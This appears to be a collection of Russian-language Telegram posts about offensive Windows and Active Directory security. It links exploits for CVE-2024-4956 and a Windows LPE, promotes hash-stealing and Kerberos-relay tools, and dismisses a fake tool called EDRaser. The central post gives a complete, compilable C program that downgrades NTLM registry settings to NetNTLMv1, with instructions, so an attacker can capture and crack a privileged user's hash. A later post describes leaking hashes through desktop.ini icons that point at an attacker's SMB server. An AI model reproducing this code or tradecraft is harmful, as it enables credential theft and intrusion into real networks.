https://github.com/fortra/impacket/pull/1719
дамп sam/system/security через shadowcopy

эту фичу можно использовать для получения кред из lsass в совокупности с описанными тут методами
P.S. сидел собирал собирал инфу а snovvcrash все уже давно описал =/

VPN

Разбираем различные методы обнаружения IP-адресов VPN от таких провайдеров, как NordVPN или ExpressVPN.

https://ipapi.is/blog/systematic-vpn-detection.html

Большой список VPN exit NODE

Private: @CrackCloudRobot
Crypto Wares: @CryptoWares
Other projects: @MalwareLinks

У меня в подписчиках точно есть те кому нужен обновляемый список public vpn exit nodes в soc, забирайте.

Так сказать, свой standoff

CVE-2024-4956 - Unauthenticated Path Traversal in Nexus Repository Manager 3
Работает…проверено…

https://github.com/gmh5225/CVE-2024-4956

На этой неделе по некоторым телеграм каналам расходился инструмент EDRaser , судя по описанию: "EDRaser - это мощный инструмент для удаленного удаления журналов доступа, журналов событий Windows, баз данных и других файлов на удаленных компьютерах. Он предлагает два режима работы: автоматический и ручной."
По факту это
- флудер http запросов со сменой useragent
- флудер сообщений по syslog (хотя там гордо написано "Deletes syslog from Linux machines running Kaspersky EDR without being.")
- не понятно что делает с виндовыми логами, особо улыбнула строка: INVOKE_MIMIKATZ_STR = base64.b64decode("QWRkLU1lbWJlciBOb3RlUHJvcGVydHkgLU5hbWUgVmlydHVhbFByb3RlY3QgLVZhbHVlICRWaXJ0dWFsUHJvdGVjdA==").decode() где в base64 засунули команду: "Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect" и полное отсутствие аутентификации.
ну и т.д.
Короче, очередной fake tools ) не тратьте на него свое время.

CVE-2024-26229 Windows LPE (PoC)

Improper Address Validation in IOCTL with METHOD_NEITHER I/O Control Code in the csc.sys driver

Сидел вчера я значит вечером и почему то решил сдать crte. Как полагается, я не готовился, не открывал лабы и не читал книгу.
Я уже как то раз так сдавал oscp, было весело.

На экзамен ушло около 10 часов.
Для тех кто перед выбором курса/экзамена: после сдачи osep кажется детской шалостью. Материал в osep,crto,crte примерно одного наполнения. Если выбирать из этих трех, советую osep.
1) Osep - web, Linux, Microsoft ad, bypass av, mssql, чуть чуть кубера + только бесплатные с2
2) Crto - Microsoft ad, mssql, bypass av + только кобальт
3) Crte - Microsoft ad, mssql, bypass av + только бесплатные с2

Печально что нет ничего по контейнерам и другим субд. Ну для контейнеров поиграть можно на стендах standoff365.

Veeam красавцы, один jwt secret на всех. И это они заботятся о сохранности наших данных:)))
Техническое описание: https://summoning.team/blog/veeam-recovery-Orchestrator-auth-bypass-CVE-2024-29855/

Всем доброго вторника! Помните, друзья, как круто было, когда вышел KrbRelay , a за ним KrbrelayUp? Казалось, что в тот день эксплуатация AD перевернулась с ног на голову. Или с головы на ноги.... :)) Не суть!)

Недавно я выкладывал статью, в которой постарался максимально просто описать процесс ретрансляции керберос аутентификации. Но ещё раньше появились интересные атаки: CertifiedDCOM и SilverPotato . Была лишь одна проблема - нет POCов. А что делают студенты, когда нет POCов? Правильно! Их пишут :))

Поэтому хочу вам с радостью представить тулзу RemoteKrbRelay, которая не просто совмещает в себе и SilverPotato и CertifiedDCOM, а является полноценным фреймворком для обнаружения уязвимых DCOM-обьектов!

Я добавил чекер, который выводит абсолютно всю информацию о DCOM-объектах системы в удобно читаемом виде (csv / xlsx). Помимо этого, присутствует встроенный функционал кросс-сессионной активации.

Представляете? Есть два компьютера. На одном вы, а на втором ДА. И вы можете со своего компьютера триггерить керберос аутентификацию ДА, абсолютно удаленно!) 🙂

Что ж, отмечу, что это лишь minimal POC и ему ещё есть куда расти :) Например, я пока не допилил функционал по релею керберос аутентификации из OXID Initial Resolution Request (а там вообще-то RPC_C_IMP_LEVEL_IMPERSONATE🤫). Впрочем, я готов принимать PR :))

При всем уважении, этому уже много лет... Джеты зачем же так. Не обязательно vm, просто нужно быть ..... чтобы оставить скрипт восстановления в корне..я так лился лет 5 назад, коллеги не дадут соврать, оно есть в словарях для фазинга веба.. https://jetcsirt.su/bulletins-page/kritichnaya-uyazvimost-v-1c-bitriks-virtualnaya-mashina-vmbitrix-/

Давно хотел написать, но чет забывал.
Уважаемые вендоры поибэ моей прекрасной Родины, я не раз отдавал вам rce в ваших инфраструктурах, данные клиентов, бывало даже дампы доменов. Время идёт, опыт показывает, что мало что меняется. Займитесь уже наконец-то внутренней безопасностью, у вас есть крутые кадры, только почему-то пентест вы своими силами своей же инфраструктуры не можете сделать. Весь рынок вы учите как строить иб, но у себя вы его так же почему то построить не можете. И т.д.

А я мля... говорил🙈 ушатали аванпост в хвост и гриву

Всем привет! В продолжение темы про NetNTLM-хешики, кражу сессий и эксплойты :))

Тут на днях вышел FakePotato, который пофиксил один супер интересный вектор повышения привилегий - через установку обоев.

Ранее у ncc group выходила крутая статья про то, как изменение обоев может привести к утечке NetNTLM-хеша. Там было достаточно много требований, ограничивающих атаку: Webdav Redirector, DNS-запись....

Однако decoder.cloud достаточно прозрачно намекнул, что нашел функционал, позволяющий изменить обои привилегированного пользователя с использованием специального COM-объекта.

"I played with the Desktop Wallpaper and was able to change the desktop background image of Adminstrator"

Поэтому приходится вскрывать карты :)

Я выложил инструмент LeakedWallpaper , который позволяет получить NetNTLM-хеши ЛЮБОГО пользователя, чья сессия присутствует на хосте. Требования по правам: любые.

Способ до установки июньского фикса KB5040434 будет работать безотказно.

Демо можно найти тут

Совсем недавно Миша выложил инструмент LeakedWallpaper, а я уже успел применить его на проекте. Все отработало отлично! Но зачем нам нужен NetNTLMv2 хеш? Давайте подумаем, как можно улучшить технику, если на компе злющий EDR, но зато есть права local admin. С правами local admin вы можете с помощью манипуляции ключами реестра сделать downgrade NTLM аутентификации до NetNTLMv1 и получить уже хеш, который можно восстановить в NTLM хеш в независимости от сложности пароля пользователя. Для этой цели я написал небольшую программу, которая бэкапит текущие настройки реестра, затем делает downgrade и через 60 сек восстанавливает все обратно.

#include <stdio.h>
#include <windows.h>
#include <winreg.h>
#include <stdint.h>
#include <unistd.h> // для функции sleep

void GetRegKey(const char* path, const char* key, DWORD* oldValue) {
    HKEY hKey;
    DWORD value;
    DWORD valueSize = sizeof(DWORD);

    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
        RegQueryValueEx(hKey, key, NULL, NULL, (LPBYTE)&value, &valueSize);
        RegCloseKey(hKey);
        *oldValue = value;
    } else {
        printf("Ошибка чтения ключа реестра.\n");
    }
}

void SetRegKey(const char* path, const char* key, DWORD newValue) {
    HKEY hKey;

    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0, KEY_WRITE, &hKey) == ERROR_SUCCESS) {
        RegSetValueEx(hKey, key, 0, REG_DWORD, (const BYTE*)&newValue, sizeof(DWORD));
        RegCloseKey(hKey);
    } else {
        printf("Ошибка записи ключа реестра.\n");
    }
}

void ExtendedNTLMDowngrade(DWORD* oldValue_LMCompatibilityLevel, DWORD* oldValue_NtlmMinClientSec, DWORD* oldValue_RestrictSendingNTLMTraffic) {
    GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", oldValue_LMCompatibilityLevel);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", 2);

    GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", oldValue_NtlmMinClientSec);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", 536870912);

    GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", oldValue_RestrictSendingNTLMTraffic);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", 0);
}

void NTLMRestore(DWORD oldValue_LMCompatibilityLevel, DWORD oldValue_NtlmMinClientSec, DWORD oldValue_RestrictSendingNTLMTraffic) {
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", oldValue_LMCompatibilityLevel);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", oldValue_NtlmMinClientSec);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", oldValue_RestrictSendingNTLMTraffic);
}

int main() {
    DWORD oldValue_LMCompatibilityLevel = 0;
    DWORD oldValue_NtlmMinClientSec = 0;
    DWORD oldValue_RestrictSendingNTLMTraffic = 0;

    ExtendedNTLMDowngrade(&oldValue_LMCompatibilityLevel, &oldValue_NtlmMinClientSec, &oldValue_RestrictSendingNTLMTraffic);

    // Задержка 60 секунд
    sleep(60);

    NTLMRestore(oldValue_LMCompatibilityLevel, oldValue_NtlmMinClientSec, oldValue_RestrictSendingNTLMTraffic);

    return 0;
}

Компилируем так

x86_64-w64-mingw32-gcc -o ntlm.exe ntlm.c

В итоге мне удалось получить NetNTLMv1 хеш небрутабельного пароля привилегированной УЗ и восстановить NTLM хеш в течении 10 часов. Profit!
Ну или для совсем ленивых добавили флаг -downgrade прямо в инструмент LeakedWallpaper :)
P.S. Не забывайте добавлять привилегированные УЗ в Protected Users.

Если у нас есть права локального администратора... и мы хотим ntlm доменного пользователя который зайдет в интерактиве..
то можно упороться в его автозагрузку с вызовом smb соединения к нашему серверу, либо создать у него на рабочем столе папку с desktop.ini, который будет грузить иконку с нашего SMB сервера. Короче вариантов украсть сессию/хэш на обмазанном антивирусами и edrами устройстве очень много.
А с вариантом выше, оно становится еще и интереснее, ибо можем получить в конечном итоге ntlm хэш пользователя.
как напоминание: https://github.com/Gl3bGl4z/All_NTLM_leak